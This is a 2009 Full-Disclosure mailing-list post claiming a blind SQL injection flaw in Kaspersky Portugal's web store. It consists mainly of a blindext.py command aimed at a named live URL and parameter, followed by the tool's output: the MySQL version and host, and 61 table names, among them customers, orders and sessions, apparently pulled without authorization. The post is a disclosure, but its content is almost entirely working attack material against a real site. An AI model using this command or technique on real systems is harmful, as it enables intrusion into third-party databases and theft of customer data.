
Date: Fri, 11 Dec 2009 11:13:20 +0000 (GMT)
From: vmware vmware <vmw4r3@...oo.ie>
To: full-disclosure@...ts.grok.org.uk
Subject: kaspersky Portugal Vulnerable to blind SQLi

kaspersky Portugal Vulnerable to blind SQLi by VMw4r3

>./blindext.py -u "http://www.kaspersky.com.pt/estore/index.php?ref=48" -s "INFORBYTE" -D kavestore --schema

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v3.0  |
|   7/2008      blindext.py                                     |
|      -Blind MySQL v5+ Information_schema Database Enumeration |
|      -Blind MySQL v4+ Data Extractor                          |
|      -Blind MySQL v4+ Table & Column Fuzzer                   |
| Usage: blindext.py [options]                                  |
|                    -h help                    darkc0de.com    |
|---------------------------------------------------------------|

[+] URL: http://www.kaspersky.com.pt/estore/index.php?ref=48
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
        [+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "kavestore"
[+] 16:33:27
[+] Number of Rows:  61

5.0.32-Debian_7etch5-log:kavestore@...alhost:kavestore

[0]: address_book
[1]: address_format
[2]: affiliate_affiliate
[3]: affiliate_banners
[4]: affiliate_banners_history
[5]: affiliate_clickthroughs
[6]: affiliate_news
[7]: affiliate_news_contents
[8]: affiliate_newsletters
[9]: affiliate_payment
[10]: affiliate_payment_status
[11]: affiliate_payment_status_history
[12]: affiliate_sales
[13]: afiliado_reg
[14]: banners
[15]: banners_history
[16]: categories
[17]: categories_description
[18]: configuration
[19]: configuration_group
[20]: counter
[21]: counter_history
[22]: countries
[23]: currencies
[24]: customers
[25]: customers_basket
[26]: customers_basket_attributes
[27]: customers_info
[28]: geo_zones
[29]: languages
[30]: licenca
[31]: manufacturers
[32]: manufacturers_info
[33]: newsletters
[34]: orders
[35]: orders_products
[36]: orders_products_attributes
[37]: orders_products_download
[38]: orders_status
[39]: orders_status_history
[40]: orders_total
[41]: products
[42]: products_attributes
[43]: products_attributes_download
[44]: products_description
[45]: products_notifications
[46]: products_options
[47]: products_options_values
[48]: products_options_values_to_products_options
[49]: products_to_categories
[50]: produto_url
[51]: renova_licenca
[52]: reviews
[53]: reviews_description
[54]: sessions
[55]: specials
[56]: tax_class
[57]: tax_rates
[58]: whos_online
[59]: zones
[60]: zones_to_geo_zones

[-] 20:31:25
[-] Total URL Requests 7304
[-] Done

Don't forget to check blindextlog.txt

VMw4r3

Send instant messages to your online friends http://uk.messenger.yahoo.com 
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
